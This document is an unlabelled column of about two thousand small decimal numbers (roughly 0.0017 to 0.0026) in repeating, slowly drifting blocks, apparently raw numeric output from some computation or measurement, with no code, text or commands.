0.00175153
0.00175587
0.00175154
0.00175587
0.00175153
0.00175153
0.00175156
0.00175586
0.00175587
0.00175587
0.00175155
0.00175153
0.00174696
0.00174262
0.00174695
0.00174696
0.00174262
0.00175153
0.00174695
0.00174696
0.00174261
0.00174261
0.00174695
0.00174695
0.00174261
0.00175157
0.00175581
0.00175585
0.00175154
0.00175584
0.00175161
0.00175153
0.00175157
0.00175581
0.00175585
0.00175154
0.00175584
0.00175161
0.00175153
0.00175152
0.00175587
0.00175587
0.00175587
0.00175152
0.00175152
0.00174692
0.00174263
0.00174695
0.0017427
0.0017469
0.00174694
0.00174266
0.00174692
0.00174263
0.00174695
0.00174271
0.0017469
0.00174694
0.00174266
0.00171142
0.00171141
0.00170711
0.00170712
0.00171142
0.00171141
0.0017071
0.00171597
0.00172029
0.00171598
0.00172029
0.00171597
0.00171597
0.00171599
0.00172028
0.00172027
0.00172029
0.00171597
0.00171599
0.00171142
0.00170711
0.00171141
0.00171142
0.00170711
0.00171597
0.00171141
0.00171142
0.00171141
0.00170713
0.00170711
0.00171141
0.00171142
0.00170711
0.00171597
0.00172029
0.00171598
0.00172029
0.00171597
0.00171597
0.001716
0.00172027
0.00172029
0.00172029
0.00171599
0.00171597
0.00171142
0.00170711
0.00171141
0.00171142
0.00170711
0.00171598
0.00171142
0.00171142
0.0017071
0.0017071
0.00171142
0.00171142
0.0017071
0.00171601
0.00172023
0.00172027
0.00171598
0.00172025
0.00171605
0.00171598
0.00171601
0.00172023
0.00172027
0.00171597
0.00172025
0.00171605
0.00171598
0.00171596
0.00172028
0.00172028
0.00172029
0.00171596
0.00171596
0.00171139
0.00170712
0.00171141
0.00170719
0.00171136
0.00171141
0.00170715
0.00171139
0.00170712
0.00171141
0.00170719
0.00171136
0.00171141
0.00170715
0.00167605
0.00167604
0.00167176
0.00167177
0.00167605
0.00167604
0.00167175
0.00168058
0.00168488
0.00168059
0.00168488
0.00168058
0.00168058
0.0016806
0.00168488
0.00168487
0.00168488
0.00168058
0.0016806
0.00167605
0.00167176
0.00167604
0.00167605
0.00167176
0.00168058
0.00167604
0.00167605
0.00167604
0.00167178
0.00167176
0.00167604
0.00167605
0.00167176
0.00168058
0.00168488
0.00168059
0.00168488
0.00168058
0.00168058
0.00168061
0.00168487
0.00168488
0.00168488
0.0016806
0.00168059
0.00167605
0.00167176
0.00167604
0.00167605
0.00167176
0.00168059
0.00167605
0.00167606
0.00167175
0.00167175
0.00167605
0.00167606
0.00167175
0.00168062
0.00168483
0.00168487
0.00168059
0.00168485
0.00168067
0.00168059
0.00168062
0.00168483
0.00168487
0.00168059
0.00168485
0.00168067
0.00168059
0.00168057
0.00168488
0.00168488
0.00168489
0.00168058
0.00168058
0.00167602
0.00167177
0.00167604
0.00167184
0.001676
0.00167604
0.0016718
0.00167602
0.00167177
0.00167605
0.00167184
0.00167599
0.00167604
0.0016718
0.0025802
0.00257507
0.0025802
0.00257507
0.00257512
0.00257029
0.00257029
0.00257506
0.00257506
0.00257034
0.00258034
0.00258504
0.00258027
0.00258495
0.00258022
0.00258044
0.002585
0.00258034
0.00258503
0.00258026
0.00258495
0.00258022
0.00258043
0.002585
0.00257512
0.00257034
0.00257511
0.00257055
0.00257506
0.00257046
0.00257515
0.00257512
0.00257034
0.00257511
0.00257055
0.00257506
0.00257046
0.00257515
0.00258022
0.00258494
0.00258494
0.00258016
0.00258016
0.00258501
0.00255534
0.00256045
0.00255535
0.00256045
0.00256047
0.00256519
0.00256519
0.00256525
0.00256042
0.00256042
0.00255538
0.00255083
0.00255538
0.00255063
0.00255534
0.00255541
0.00255074
0.00255538
0.00255083
0.00255539
0.00255063
0.00255534
0.00255542
0.00255074
0.00256059
0.00256519
0.00256527
0.00256052
0.00256524
0.00256048
0.00256068
0.00256059
0.00256519
0.00256527
0.00256052
0.00256524
0.00256048
0.00256068
0.00255539
0.00255057
0.00255057
0.00255533
0.00255533
0.00255062
0.0025751
0.00257035
0.00257043
0.00257516
0.0025751
0.00257515
0.00257034
0.00258021
0.00258023
0.00258502
0.00258025
0.00258497
0.00257509
0.00257037
0.00257509
0.00257513
0.00257033
0.00258022
0.00258034
0.00258499
0.00258503
0.00258023
0.00258031
0.00258499
0.00256047
0.00256523
0.00256527
0.00256059
0.00256523
0.00256048
0.00256056
0.00255536
0.00255536
0.00255065
0.00255061
0.0025554
0.00256046
0.00256526
0.00256049
0.00256522
0.00256051
0.00255537
0.00255543
0.00255063
0.00255071
0.00255062
0.00255538
0.00255541
0.00256048
0.00256523
0.00256527
0.00256059
0.00256523
0.00256048
0.00256056
0.00255536
0.00255536
0.00255065
0.0025554
0.00255061
0.00256046
0.00256526
0.00256049
0.00256522
0.00256051
0.00255537
0.00255543
0.00255063
0.00255071
0.00255538
0.00255541
0.00255062
0.00257512
0.00257029
0.00257029
0.00257506
0.00257506
0.00257034
0.00258034
0.00258504
0.00258027
0.00258495
0.00258022
0.00258043
0.002585
0.00258034
0.00258504
0.00258027
0.00258495
0.00258043
0.00258022
0.002585
0.00257512
0.00257034
0.00257512
0.00257055
0.00257507
0.00257515
0.00257046
0.00257512
0.00257034
0.00257511
0.00257055
0.00257515
0.00257507
0.00257046
0.00258022
0.00258494
0.00258494
0.00258017
0.00258017
0.00258501
0.0025802
0.00257507
0.00255535
0.00256046
0.00256047
0.00256519
0.00256519
0.00256525
0.00256042
0.00256042
0.00255539
0.00255083
0.00255539
0.00255063
0.00255542
0.00255534
0.00255074
0.00255539
0.00255083
0.00255538
0.00255063
0.00255534
0.00255542
0.00255074
0.00256059
0.00256519
0.00256528
0.00256052
0.00256069
0.00256524
0.00256048
0.00256059
0.00256519
0.00256527
0.00256052
0.00256524
0.00256048
0.00256069
0.00255539
0.00255057
0.00255057
0.00255533
0.00255533
0.00255062
0.00255535
0.00256046
0.0025751
0.00257035
0.00257043
0.00257516
0.0025751
0.00257515
0.00257034
0.00258021
0.00258023
0.00258502
0.00258025
0.00258497
0.00257509
0.00257037
0.00257509
0.00257513
0.00257033
0.00258022
0.00258033
0.00258499
0.00258503
0.00258023
0.00258031
0.00258499
0.00256047
0.00256527
0.00256523
0.00256059
0.00256523
0.00256056
0.00256048
0.00255536
0.00255536
0.00255065
0.00255061
0.0025554
0.00256046
0.00256526
0.00256049
0.00256522
0.00256051
0.00255537
0.00255543
0.00255071
0.00255063
0.00255062
0.00255541
0.00255538
0.00256048
0.00256523
0.00256527
0.00256059
0.00256523
0.00256048
0.00256056
0.00255536
0.00255536
0.00255065
0.0025554
0.00255061
0.00256046
0.00256526
0.00256049
0.00256522
0.00256051
0.00255537
0.00255543
0.00255063
0.00255071
0.00255538
0.00255541
0.00255062
0.0025751
0.00257043
0.00257035
0.00257516
0.00257515
0.0025751
0.00257034
0.00258021
0.00258023
0.00258502
0.00258025
0.00258497
0.00257509
0.00257037
0.00257509
0.00257513
0.00257033
0.00258022
0.00258034
0.00258503
0.00258499
0.00258031
0.00258023
0.00258499
0.0025751
0.00257035
0.00257043
0.00257516
0.0025751
0.00257515
0.00257034
0.00258021
0.00258023
0.00258502
0.00258025
0.00258497
0.00257509
0.00257037
0.00257509
0.00257513
0.00257033
0.00258022
0.00258034
0.00258499
0.00258503
0.00258023
0.00258031
0.00258499
0.00256047
0.00256527
0.00256523
0.00256059
0.00256523
0.00256056
0.00256048
0.00255536
0.00255536
0.00255065
0.0025554
0.00255061
0.00256046
0.00256526
0.00256049
0.00256522
0.00256051
0.00255537
0.00255543
0.00255071
0.00255063
0.00255541
0.00255538
0.00255062
0.00256047
0.00256523
0.00256527
0.00256059
0.00256523
0.00256048
0.00256056
0.00255536
0.00255536
0.00255065
0.0025554
0.00255061
0.00256046
0.00256526
0.00256049
0.00256522
0.00256051
0.00255537
0.00255543
0.00255063
0.00255071
0.00255538
0.00255541
0.00255062
0.00257512
0.00257029
0.00257029
0.00257506
0.00257506
0.00257034
0.00258034
0.00258504
0.00258027
0.00258495
0.00258022
0.00258043
0.002585
0.00258034
0.00258504
0.00258027
0.00258495
0.00258043
0.00258022
0.002585
0.00257512
0.00257034
0.00257512
0.00257055
0.00257507
0.00257515
0.00257046
0.00257512
0.00257034
0.00257512
0.00257055
0.00257515
0.00257507
0.00257046
0.00258022
0.00258494
0.00258494
0.00258017
0.00258017
0.00258501
0.0025802
0.00257507
0.00255535
0.00256046
0.00256047
0.00256519
0.00256519
0.00256525
0.00256042
0.00256042
0.00255538
0.00255083
0.00255538
0.00255063
0.00255542
0.00255534
0.00255074
0.00255539
0.00255083
0.00255538
0.00255063
0.00255534
0.00255542
0.00255074
0.00256059
0.00256519
0.00256527
0.00256052
0.00256069
0.00256524
0.00256048
0.00256059
0.00256519
0.00256528
0.00256052
0.00256524
0.00256048
0.00256068
0.00255539
0.00255057
0.00255057
0.00255533
0.00255533
0.00255062
0.00255535
0.00256045
0.0025751
0.00257043
0.00257035
0.00257516
0.00257515
0.0025751
0.00257034
0.00258021
0.00258023
0.00258502
0.00258025
0.00258497
0.00257509
0.00257037
0.00257509
0.00257513
0.00257033
0.00258022
0.00258033
0.00258503
0.00258499
0.00258031
0.00258023
0.00258499
0.0025751
0.00257043
0.00257035
0.00257516
0.00257515
0.0025751
0.00257034
0.00258021
0.00258023
0.00258502
0.00258025
0.00258497
0.00257509
0.00257037
0.00257509
0.00257513
0.00257033
0.00258022
0.00258033
0.00258503
0.00258499
0.00258031
0.00258023
0.00258499
0.00256047
0.00256527
0.00256523
0.00256059
0.00256523
0.00256056
0.00256048
0.00255536
0.00255536
0.00255065
0.0025554
0.00255061
0.00256046
0.00256526
0.00256049
0.00256522
0.00256051
0.00255537
0.00255543
0.00255071
0.00255063
0.00255541
0.00255538
0.00255062
0.00256047
0.00256527
0.00256523
0.00256059
0.00256523
0.00256056
0.00256048
0.00255536
0.00255536
0.00255065
0.0025554
0.00255061
0.00256046
0.00256526
0.00256049
0.00256522
0.00256051
0.00255537
0.00255543
0.00255071
0.00255063
0.00255541
0.00255538
0.00255062
0.0025802
0.00257507
0.0025802
0.00257507
0.00256047
0.00256519
0.00256519
0.00256525
0.00256042
0.00256042
0.00255538
0.00255083
0.00255538
0.00255063
0.00255074
0.00255541
0.00255534
0.00255538
0.00255083
0.00255538
0.00255063
0.00255074
0.00255542
0.00255534
0.00256059
0.00256519
0.00256528
0.00256052
0.00256524
0.00256068
0.00256048
0.00256059
0.00256519
0.00256528
0.00256052
0.00256524
0.00256068
0.00256048
0.00255539
0.00255057
0.00255057
0.00255062
0.00255533
0.00255533
0.00255535
0.00256045
0.00255535
0.00256045
0.00254077
0.00253567
0.00254077
0.00253567
0.00253572
0.00253091
0.00253091
0.00253566
0.00253566
0.00253096
0.0025409
0.00254557
0.00254549
0.00254083
0.00254554
0.00254079
0.00254099
0.0025409
0.00254557
0.00254549
0.00254083
0.00254554
0.00254079
0.00254099
0.00254078
0.00254549
0.00254549
0.00254555
0.00254073
0.00254073
0.00253571
0.00253096
0.00253571
0.00253117
0.00253566
0.00253107
0.00253574
0.00253571
0.00253096
0.00253571
0.00253117
0.00253566
0.00253107
0.00253574
0.00251606
0.00252113
0.00251606
0.00252113
0.00252115
0.00252584
0.00252584
0.0025259
0.0025211
0.0025211
0.00251609
0.00251156
0.00251609
0.00251136
0.00251605
0.00251612
0.00251146
0.00251609
0.00251156
0.00251609
0.00251136
0.00251605
0.00251612
0.00251146
0.00252126
0.00252585
0.00252592
0.00252119
0.00252589
0.00252115
0.00252136
0.00252126
0.00252585
0.00252592
0.00252119
0.00252589
0.00252115
0.00252135
0.0025161
0.00251131
0.00251131
0.00251604
0.00251604
0.00251135
0.0025357
0.00253575
0.00253097
0.00253104
0.0025357
0.00253574
0.00253096
0.00254077
0.00254556
0.0025408
0.00254552
0.00254082
0.00254079
0.00254089
0.00254553
0.00254557
0.00254079
0.00254553
0.00254087
0.00253569
0.00253099
0.00253569
0.00253573
0.00253095
0.00252115
0.00252589
0.00252592
0.00252126
0.00252588
0.00252116
0.00252123
0.00251607
0.00251607
0.00251138
0.00251134
0.00251611
0.00252114
0.00252591
0.00252116
0.00252587
0.00252118
0.00251608
0.00251613
0.00251136
0.00251143
0.00251136
0.00251608
0.00251612
0.00252115
0.00252589
0.00252592
0.00252126
0.00252588
0.00252116
0.00252123
0.00251607
0.00251607
0.00251138
0.00251611
0.00251134
0.00252114
0.00252591
0.00252116
0.00252587
0.00252118
0.00251608
0.00251613
0.00251136
0.00251143
0.00251608
0.00251612
0.00251136
0.00253572
0.00253091
0.00253091
0.00253566
0.00253566
0.00253096
0.0025409
0.00254557
0.00254549
0.00254083
0.00254079
0.00254554
0.00254099
0.0025409
0.00254557
0.00254549
0.00254083
0.00254099
0.00254554
0.00254079
0.00254079
0.00254549
0.00254549
0.00254073
0.00254555
0.00254073
0.00253571
0.00253096
0.00253571
0.00253117
0.00253566
0.00253574
0.00253107
0.00253571
0.00253096
0.00253571
0.00253117
0.00253574
0.00253566
0.00253107
0.00254077
0.00253567
0.00251606
0.00252113
0.00252115
0.00252584
0.00252584
0.0025259
0.0025211
0.0025211
0.00251609
0.00251156
0.00251609
0.00251136
0.00251612
0.00251605
0.00251146
0.00251609
0.00251156
0.00251609
0.00251136
0.00251605
0.00251612
0.00251146
0.00252126
0.00252585
0.00252592
0.00252119
0.00252136
0.00252589
0.00252115
0.00252126
0.00252585
0.00252592
0.00252119
0.00252589
0.00252115
0.00252136
0.0025161
0.00251131
0.00251131
0.00251604
0.00251604
0.00251135
0.00251606
0.00252113
0.0025357
0.00253575
0.00253097
0.00253104
0.0025357
0.00253574
0.00253096
0.00254077
0.00254556
0.0025408
0.00254552
0.00254082
0.00254079
0.00254089
0.00254553
0.00254557
0.00254079
0.00254553
0.00254087
0.00253569
0.00253099
0.00253569
0.00253573
0.00253095
0.00252115
0.00252592
0.00252589
0.00252125
0.00252588
0.00252123
0.00252116
0.00251607
0.00251607
0.00251138
0.00251134
0.00251611
0.00252114
0.00252591
0.00252116
0.00252587
0.00252118
0.00251608
0.00251613
0.00251143
0.00251136
0.00251136
0.00251612
0.00251608
0.00252115
0.00252589
0.00252592
0.00252126
0.00252588
0.00252116
0.00252123
0.00251607
0.00251607
0.00251138
0.00251611
0.00251134
0.00252114
0.00252591
0.00252116
0.00252587
0.00252118
0.00251608
0.00251613
0.00251136
0.00251143
0.00251608
0.00251612
0.00251136
0.0025357
0.00253575
0.00253104
0.00253097
0.00253574
0.0025357
0.00253096
0.00254077
0.00254556
0.0025408
0.00254082
0.00254552
0.00254079
0.00254089
0.00254557
0.00254553
0.00254087
0.00254553
0.0025408
0.00253569
0.00253099
0.00253569
0.00253573
0.00253095
0.0025357
0.00253575
0.00253097
0.00253104
0.0025357
0.00253574
0.00253096
0.00254077
0.00254556
0.0025408
0.00254552
0.00254082
0.00254079
0.00254089
0.00254553
0.00254557
0.00254553
0.0025408
0.00254087
0.00253569
0.00253099
0.00253569
0.00253573
0.00253095
0.00252115
0.00252592
0.00252589
0.00252126
0.00252588
0.00252123
0.00252116
0.00251607
0.00251607
0.00251138
0.00251611
0.00251134
0.00252114
0.00252591
0.00252116
0.00252587
0.00252118
0.00251608
0.00251613
0.00251143
0.00251136
0.00251612
0.00251608
0.00251136
0.00252115
0.00252589
0.00252592
0.00252126
0.00252588
0.00252116
0.00252123
0.00251607
0.00251607
0.00251138
0.00251611
0.00251134
0.00252114
0.00252591
0.00252116
0.00252587
0.00252118
0.00251608
0.00251613
0.00251136
0.00251143
0.00251608
0.00251612
0.00251136
0.00253572
0.00253091
0.00253091
0.00253566
0.00253566
0.00253096
0.0025409
0.00254557
0.00254549
0.00254083
0.00254079
0.00254554
0.00254099
0.0025409
0.00254557
0.00254549
0.00254083
0.00254099
0.00254554
0.00254079
0.00254079
0.00254549
0.00254549
0.00254073
0.00254555
0.00254073
0.00253571
0.00253096
0.00253571
0.00253117
0.00253566
0.00253574
0.00253107
0.00253571
0.00253096
0.00253571
0.00253117
0.00253574
0.00253566
0.00253107
0.00254077
0.00253567
0.00251606
0.00252113
0.00252115
0.00252584
0.00252584
0.0025259
0.0025211
0.0025211
0.00251609
0.00251156
0.00251609
0.00251136
0.00251612
0.00251605
0.00251146
0.00251609
0.00251156
0.00251609
0.00251136
0.00251605
0.00251612
0.00251147
0.00252126
0.00252585
0.00252592
0.00252119
0.00252136
0.00252589
0.00252115
0.00252126
0.00252585
0.00252592
0.00252119
0.00252589
0.00252115
0.00252136
0.0025161
0.00251131
0.00251131
0.00251604
0.00251604
0.00251135
0.00251606
0.00252113
0.0025357
0.00253575
0.00253104
0.00253097
0.00253574
0.0025357
0.00253096
0.00254077
0.00254556
0.0025408
0.00254081
0.00254552
0.00254079
0.00254089
0.00254557
0.00254553
0.00254087
0.00254553
0.00254079
0.00253569
0.00253099
0.00253569
0.00253573
0.00253095
0.0025357
0.00253575
0.00253104
0.00253097
0.00253574
0.0025357
0.00253096
0.00254077
0.00254556
0.0025408
0.00254552
0.00254081
0.00254079
0.00254089
0.00254557
0.00254553
0.00254553
0.00254087
0.00254079
0.00253569
0.00253099
0.00253569
0.00253573
0.00253095
0.00252115
0.00252592
0.00252589
0.00252125
0.00252588
0.00252123
0.00252116
0.00251607
0.00251607
0.00251138
0.00251611
0.00251134
0.00252114
0.00252591
0.00252116
0.00252587
0.00252118
0.00251608
0.00251613
0.00251143
0.00251136
0.00251612
0.00251608
0.00251135
0.00252115
0.00252592
0.00252589
0.00252125
0.00252588
0.00252123
0.00252116
0.00251607
0.00251607
0.00251138
0.00251611
0.00251134
0.00252114
0.00252591
0.00252116
0.00252587
0.00252118
0.00251608
0.00251613
0.00251143
0.00251136
0.00251612
0.00251608
0.00251135
0.00254077
0.00253567
0.00254077
0.00253567
0.00252115
0.00252584
0.00252584
0.0025259
0.0025211
0.0025211
0.00251609
0.00251156
0.00251609
0.00251136
0.00251146
0.00251612
0.00251605
0.00251609
0.00251156
0.00251609
0.00251136
0.00251146
0.00251612
0.00251605
0.00252126
0.00252585
0.00252592
0.00252119
0.00252589
0.00252136
0.00252115
0.00252126
0.00252585
0.00252592
0.00252119
0.00252589
0.00252136
0.00252115
0.0025161
0.00251131
0.00251131
0.00251135
0.00251604
0.00251604
0.00251606
0.00252113
0.00251606
0.00252113
0.00250156
0.00249649
0.00250156
0.00249649
0.00249653
0.00249175
0.00249175
0.00249648
0.00249648
0.0024918
0.00250168
0.00250633
0.00250626
0.00250161
0.0025063
0.00250157
0.00250177
0.00250168
0.00250633
0.00250626
0.00250161
0.0025063
0.00250157
0.00250177
0.00250157
0.00250625
0.00250625
0.00250631
0.00250152
0.00250152
0.00249652
0.0024918
0.00249653
0.002492
0.00249648
0.00249191
0.00249655
0.00249652
0.0024918
0.00249653
0.002492
0.00249648
0.00249191
0.00249655
0.00247698
0.00248203
0.00247698
0.00248203
0.00248204
0.00248672
0.00248672
0.00248677
0.002482
0.002482
0.00247701
0.0024725
0.00247701
0.0024723
0.00247697
0.00247704
0.00247241
0.00247701
0.0024725
0.00247702
0.0024723
0.00247697
0.00247704
0.00247241
0.00248215
0.00248672
0.00248679
0.00248208
0.00248676
0.00248205
0.00248224
0.00248215
0.00248672
0.00248679
0.00248208
0.00248676
0.00248205
0.00248224
0.00247702
0.00247226
0.00247226
0.00247697
0.00247697
0.0024723
0.00249652
0.00249656
0.00249181
0.00249188
0.00249652
0.00249655
0.0024918
0.00250156
0.00250632
0.00250158
0.00250628
0.0025016
0.00250157
0.00250167
0.0025063
0.00250633
0.00250158
0.00250629
0.00250165
0.00249651
0.00249183
0.00249651
0.00249654
0.00249179
0.00248205
0.00248676
0.00248679
0.00248214
0.00248676
0.00248206
0.00248212
0.002477
0.002477
0.00247233
0.00247229
0.00247703
0.00248204
0.00248678
0.00248206
0.00248675
0.00248207
0.00247701
0.00247705
0.00247231
0.00247238
0.0024723
0.00247701
0.00247704
0.00248205
0.00248676
0.00248679
0.00248214
0.00248676
0.00248206
0.00248212
0.002477
0.002477
0.00247233
0.00247703
0.00247229
0.00248204
0.00248678
0.00248206
0.00248675
0.00248207
0.00247701
0.00247705
0.00247231
0.00247238
0.00247701
0.00247704
0.0024723
0.00249653
0.00249176
0.00249175
0.00249648
0.00249648
0.0024918
0.00250168
0.00250633
0.00250626
0.00250161
0.00250157
0.0025063
0.00250177
0.00250168
0.00250633
0.00250626
0.00250161
0.00250177
0.0025063
0.00250157
0.00250157
0.00250625
0.00250625
0.00250152
0.00250631
0.00250152
0.00249652
0.0024918
0.00249653
0.002492
0.00249648
0.00249655
0.00249191
0.00249652
0.0024918
0.00249653
0.002492
0.00249655
0.00249648
0.00249191
0.00250156
0.00249649
0.00247698
0.00248203
0.00248204
0.00248672
0.00248672
0.00248677
0.002482
0.002482
0.00247701
0.0024725
0.00247702
0.0024723
0.00247704
0.00247697
0.00247241
0.00247701
0.0024725
0.00247701
0.0024723
0.00247697
0.00247704
0.00247241
0.00248215
0.00248672
0.00248679
0.00248208
0.00248225
0.00248676
0.00248205
0.00248215
0.00248672
0.00248679
0.00248208
0.00248676
0.00248205
0.00248225
0.00247702
0.00247226
0.00247226
0.00247697
0.00247697
0.0024723
0.00247698
0.00248203
0.00249652
0.00249656
0.00249181
0.00249188
0.00249652
0.00249655
0.0024918
0.00250156
0.00250632
0.00250158
0.00250628
0.0025016
0.00250157
0.00250167
0.0025063
0.00250633
0.00250158
0.00250629
0.00250165
0.00249651
0.00249183
0.00249651
0.00249654
0.00249179
0.00248205
0.00248679
0.00248676
0.00248214
0.00248676
0.00248212
0.00248205
0.002477
0.002477
0.00247233
0.00247229
0.00247703
0.00248204
0.00248678
0.00248206
0.00248675
0.00248207
0.00247701
0.00247705
0.00247238
0.00247231
0.0024723
0.00247704
0.00247701
0.00248205
0.00248676
0.00248679
0.00248214
0.00248676
0.00248205
0.00248212
0.002477
0.002477
0.00247233
0.00247703
0.00247229
0.00248204
0.00248678
0.00248206
0.00248675
0.00248207
0.00247701
0.00247705
0.00247231
0.00247238
0.00247701
0.00247704
0.0024723
0.00249652
0.00249657
0.00249188
0.00249181
0.00249655
0.00249652
0.0024918
0.00250156
0.00250632
0.00250158
0.0025016
0.00250628
0.00250157
0.00250167
0.00250633
0.0025063
0.00250165
0.00250629
0.00250158
0.00249651
0.00249183
0.00249651
0.00249655
0.00249179
0.00249652
0.00249657
0.00249181
0.00249188
0.00249652
0.00249655
0.0024918
0.00250156
0.00250632
0.00250158
0.00250628
0.0025016
0.00250157
0.00250167
0.0025063
0.00250633
0.00250629
0.00250158
0.00250165
0.00249651
0.00249183
0.00249651
0.00249655
0.00249179
0.00248205
0.00248679
0.00248676
0.00248214
0.00248676
0.00248212
0.00248206
0.002477
0.002477
0.00247233
0.00247703
0.00247229
0.00248204
0.00248678
0.00248206
0.00248675
0.00248207
0.00247701
0.00247705
0.00247238
0.00247231
0.00247704
0.00247701
0.0024723
0.00248205
0.00248676
0.00248679
0.00248214
0.00248676
0.00248206
0.00248212
0.002477
0.002477
0.00247233
0.00247703
0.00247229
0.00248204
0.00248678
0.00248206
0.00248675
0.00248207
0.00247701
0.00247705
0.00247231
0.00247238
0.00247701
0.00247704
0.0024723
0.00249653
0.00249175
0.00249175
0.00249648
0.00249648
0.0024918
0.00250168
0.00250633
0.00250626
0.00250161
0.00250157
0.0025063
0.00250177
0.00250168
0.00250633
0.00250626
0.00250161
0.00250177
0.0025063
0.00250157
0.00250157
0.00250625
0.00250625
0.00250152
0.00250631
0.00250152
0.00249652
0.0024918
0.00249653
0.002492
0.00249648
0.00249655
0.00249191
0.00249652
0.0024918
0.00249653
0.002492
0.00249655
0.00249648
0.00249191
0.00250156
0.00249649
0.00247698
0.00248203
0.00248204
0.00248672
0.00248672
0.00248677
0.002482
0.002482
0.00247701
0.0024725
0.00247701
0.0024723
0.00247704
0.00247697
0.00247241
0.00247701
0.0024725
0.00247702
0.0024723
0.00247697
0.00247704
0.00247241
0.00248215
0.00248672
0.00248679
0.00248208
0.00248225
0.00248676
0.00248205
0.00248215
0.00248672
0.00248679
0.00248208
0.00248676
0.00248205
0.00248224
0.00247702
0.00247226
0.00247226
0.00247697
0.00247697
0.0024723
0.00247698
0.00248203
0.00249652
0.00249656
0.00249188
0.00249181
0.00249655
0.00249652
0.0024918
0.00250156
0.00250632
0.00250158
0.0025016
0.00250628
0.00250157
0.00250167
0.00250633
0.00250629
0.00250165
0.00250629
0.00250158
0.00249651
0.00249183
0.00249651
0.00249654
0.00249179
0.00249652
0.00249656
0.00249188
0.00249181
0.00249655
0.00249652
0.0024918
0.00250156
0.00250632
0.00250158
0.00250628
0.0025016
0.00250157
0.00250167
0.00250633
0.00250629
0.00250629
0.00250165
0.00250158
0.00249651
0.00249183
0.00249651
0.00249654
0.00249179
0.00248205
0.00248679
0.00248676
0.00248214
0.00248676
0.00248212
0.00248205
0.002477
0.002477
0.00247233
0.00247703
0.00247229
0.00248204
0.00248678
0.00248206
0.00248675
0.00248207
0.00247701
0.00247705
0.00247238
0.00247231
0.00247704
0.00247701
0.0024723
0.00248205
0.00248679
0.00248676
0.00248214
0.00248675
0.00248212
0.00248205
0.002477
0.002477
0.00247233
0.00247703
0.00247229
0.00248204
0.00248678
0.00248206
0.00248674
0.00248207
0.00247701
0.00247705
0.00247238
0.00247231
0.00247704
0.00247701
0.0024723
0.00250156
0.00249649
0.00250155
0.00249649
0.00248204
0.00248672
0.00248672
0.00248677
0.002482
0.002482
0.00247701
0.0024725
0.00247702
0.0024723
0.00247241
0.00247704
0.00247697
0.00247701
0.0024725
0.00247702
0.0024723
0.00247241
0.00247704
0.00247697
0.00248215
0.00248672
0.00248679
0.00248208
0.00248676
0.00248224
0.00248205
0.00248215
0.00248672
0.00248679
0.00248208
0.00248676
0.00248224
0.00248205
0.00247702
0.00247226
0.00247226
0.0024723
0.00247697
0.00247697
0.00247698
0.00248203
0.00247698
0.00248203
0.00246256
0.00245753
0.00246256
0.00245753
0.00245756
0.00245281
0.00245281
0.00245751
0.00245751
0.00245285
0.00246267
0.0024673
0.00246724
0.00246261
0.00246727
0.00246257
0.00246277
0.00246267
0.0024673
0.00246724
0.00246261
0.00246727
0.00246257
0.00246277
0.00246257
0.00246724
0.00246724
0.00246729
0.00246253
0.00246253
0.00245755
0.00245286
0.00245755
0.00245305
0.00245751
0.00245295
0.00245758
0.00245755
0.00245286
0.00245756
0.00245305
0.00245751
0.00245295
0.00245758
0.00243812
0.00244314
0.00243812
0.00244314
0.00244315
0.0024478
0.0024478
0.00244785
0.00244311
0.00244311
0.00243814
0.00243365
0.00243815
0.00243346
0.00243811
0.00243817
0.00243356
0.00243814
0.00243365
0.00243815
0.00243346
0.00243811
0.00243817
0.00243355
0.00244325
0.0024478
0.00244787
0.00244318
0.00244784
0.00244315
0.00244334
0.00244325
0.0024478
0.00244787
0.00244318
0.00244784
0.00244315
0.00244334
0.00243815
0.00243341
0.00243341
0.00243811
0.00243811
0.00243345
0.00245755
0.00245759
0.00245286
0.00245293
0.00245755
0.00245758
0.00245286
0.00246256
0.0024673
0.00246258
0.00246726
0.0024626
0.00246257
0.00246267
0.00246728
0.0024673
0.00246258
0.00246727
0.00246265
0.00245754
0.00245288
0.00245754
0.00245758
0.00245285
0.00244315
0.00244784
0.00244787
0.00244324
0.00244784
0.00244316
0.00244322
0.00243813
0.00243813
0.00243348
0.00243345
0.00243817
0.00244314
0.00244786
0.00244316
0.00244783
0.00244318
0.00243814
0.00243818
0.00243347
0.00243353
0.00243346
0.00243814
0.00243817
0.00244315
0.00244784
0.00244787
0.00244324
0.00244784
0.00244316
0.00244322
0.00243813
0.00243813
0.00243348
0.00243817
0.00243345
0.00244314
0.00244786
0.00244316
0.00244783
0.00244318
0.00243814
0.00243818
0.00243347
0.00243353
0.00243814
0.00243817
0.00243346
0.00245756
0.00245281
0.00245281
0.00245751
0.00245751
0.00245285
0.00246267
0.0024673
0.00246724
0.00246261
0.00246257
0.00246727
0.00246277
0.00246267
0.0024673
0.00246724
0.00246261
0.00246277
0.00246727
0.00246257
0.00246257
0.00246724
0.00246724
0.00246253
0.00246729
0.00246253
0.00245755
0.00245286
0.00245756
0.00245305
0.00245751
0.00245758
0.00245296
0.00245755
0.00245286
0.00245756
0.00245305
0.00245758
0.00245751
0.00245296
0.00246256
0.00245753
0.00243812
0.00244314
0.00244315
0.0024478
0.0024478
0.00244785
0.00244311
0.00244311
0.00243814
0.00243365
0.00243815
0.00243346
0.00243817
0.00243811
0.00243356
0.00243814
0.00243365
0.00243815
0.00243346
0.00243811
0.00243817
0.00243356
0.00244325
0.0024478
0.00244787
0.00244318
0.00244334
0.00244784
0.00244315
0.00244325
0.0024478
0.00244787
0.00244318
0.00244784
0.00244315
0.00244334
0.00243816
0.00243342
0.00243341
0.00243811
0.00243811
0.00243345
0.00243812
0.00244314
0.00245755
0.00245759
0.00245286
0.00245293
0.00245755
0.00245758
0.00245286
0.00246256
0.0024673
0.00246258
0.00246726
0.0024626
0.00246257
0.00246267
0.00246727
0.0024673
0.00246258
0.00246727
0.00246265
0.00245754
0.00245288
0.00245754
0.00245757
0.00245285
0.00244315
0.00244787
0.00244784
0.00244324
0.00244784
0.00244322
0.00244316
0.00243813
0.00243813
0.00243348
0.00243345
0.00243817
0.00244314
0.00244786
0.00244316
0.00244783
0.00244317
0.00243814
0.00243818
0.00243353
0.00243347
0.00243346
0.00243817
0.00243814
0.00244315
0.00244784
0.00244787
0.00244324
0.00244784
0.00244316
0.00244322
0.00243813
0.00243813
0.00243348
0.00243816
0.00243345
0.00244314
0.00244786
0.00244316
0.00244783
0.00244318
0.00243814
0.00243818
0.00243347
0.00243353
0.00243814
0.00243817
0.00243346
0.00245755
0.00245759
0.00245293
0.00245286
0.00245758
0.00245755
0.00245286
0.00246256
0.0024673
0.00246258
0.0024626
0.00246726
0.00246257
